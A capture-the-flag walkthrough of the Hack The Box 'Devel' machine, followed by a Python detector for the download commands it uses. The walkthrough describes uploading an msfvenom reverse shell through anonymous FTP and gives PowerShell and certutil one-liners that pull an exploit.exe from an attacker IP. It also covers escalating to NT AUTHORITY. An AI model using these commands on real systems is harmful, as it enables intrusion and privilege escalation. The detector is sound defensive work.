
Hack the box – Devel without Metasploit

I’m skipping Blue since it’s the same as Legacy and moving to Devel.

For exploitation I used the following:

  1. nmap
  2. msfvenom
  3. SimpleHTTPServer

From the nmap scan I found out that anonymous login is enabled for FTP.

When logged in, I found out that the anonymous user has the rights to push files to the web server. I created a reverse shell using msfvenom and uploaded it.

From the browser I went to the URL with netcat listening and got a low-level Windows shell. From systeminfo I found out that it was a vulnerable build.

I searched for the exploit on Google and found one, then searched through searchsploit to find the same one.

I compiled the exploit using i686-w64-mingw32-gcc as instructed. If you don’t have it installed, you can install it by typing apt install mingw-w64.

After compiling the exploit, use SimpleHTTPServer to host it so that it can be downloaded to the Windows box.

There are two ways to download this file to the Windows box from the command line:

  1. Using PowerShell

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.22/exploit.exe', 'c:\Users\Public\Downloads\exploit.exe')"

  2. Using Certutil

certutil.exe -urlcache -split -f http://10.10.14.22/exploit.exe exploitee.exe
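
Both download commands above leave a distinctive process command line, which is what a defender would alert on. The following is an added example, not part of the original post: a small detector run over constructed process-creation command lines. The rule names, the `classify` and `scan` helpers and every sample line other than the two commands from this post are assumptions made for illustration.

```python
import re

# Constructed sample command lines, as they would appear in process-creation
# logs (Sysmon Event ID 1, or Security 4688 with command-line auditing).
# The first two are the commands from the post; the rest are made up.
SAMPLE_EVENTS = [
    r'''powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.22/exploit.exe', 'c:\Users\Public\Downloads\exploit.exe')"''',
    r'certutil.exe -urlcache -split -f http://10.10.14.22/exploit.exe exploitee.exe',
    r'CertUtil /URLCache /f http://198.51.100.7/a.bin C:\Windows\Temp\a.bin',
    r'certutil.exe -hashfile C:\Windows\System32\notepad.exe SHA256',
    r'powershell -c "Get-ChildItem C:\inetpub\wwwroot"',
]

URL = re.compile(r'''https?://[^\s'")]+''', re.I)
# certutil accepts both "-" and "/" as the switch prefix, in any letter case.
CERTUTIL = re.compile(r'\bcertutil(\.exe)?\b.*[-/]urlcache\b', re.I)
# System.Net.WebClient download methods called from a PowerShell one-liner.
PS_DL = re.compile(
    r'\bpowershell(\.exe)?\b.*\bnet\.webclient\b.*\.download(file|string|data)\b', re.I)
IP_URL = re.compile(r'https?://\d{1,3}(\.\d{1,3}){3}([:/]|$)', re.I)

def classify(cmdline):
    """Return a finding dict for a file-download command line, else None."""
    if CERTUTIL.search(cmdline):
        rule = 'certutil-urlcache-download'
    elif PS_DL.search(cmdline):
        rule = 'powershell-webclient-download'
    else:
        return None
    m = URL.search(cmdline)
    url = m.group(0) if m else None
    return {
        'rule': rule,
        'url': url,
        # A bare IP address instead of a hostname raises the priority.
        'ip_literal': bool(url and IP_URL.match(url)),
        'executable_payload': bool(
            url and re.search(r'\.(exe|dll|ps1|bat)$', url.split('?')[0], re.I)),
    }

def scan(events):
    """Return (command line, finding) pairs for every matching event."""
    return [(e, f) for e in events if (f := classify(e))]

if __name__ == '__main__':
    for event, finding in scan(SAMPLE_EVENTS):
        print(finding['rule'], finding['url'], sep='\t')
```

Legitimate uses of certutil such as `-hashfile` do not match, so the rule stays quiet on routine administration.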

After downloading the exploit, run it from the command line. We have NT AUTHORITY.
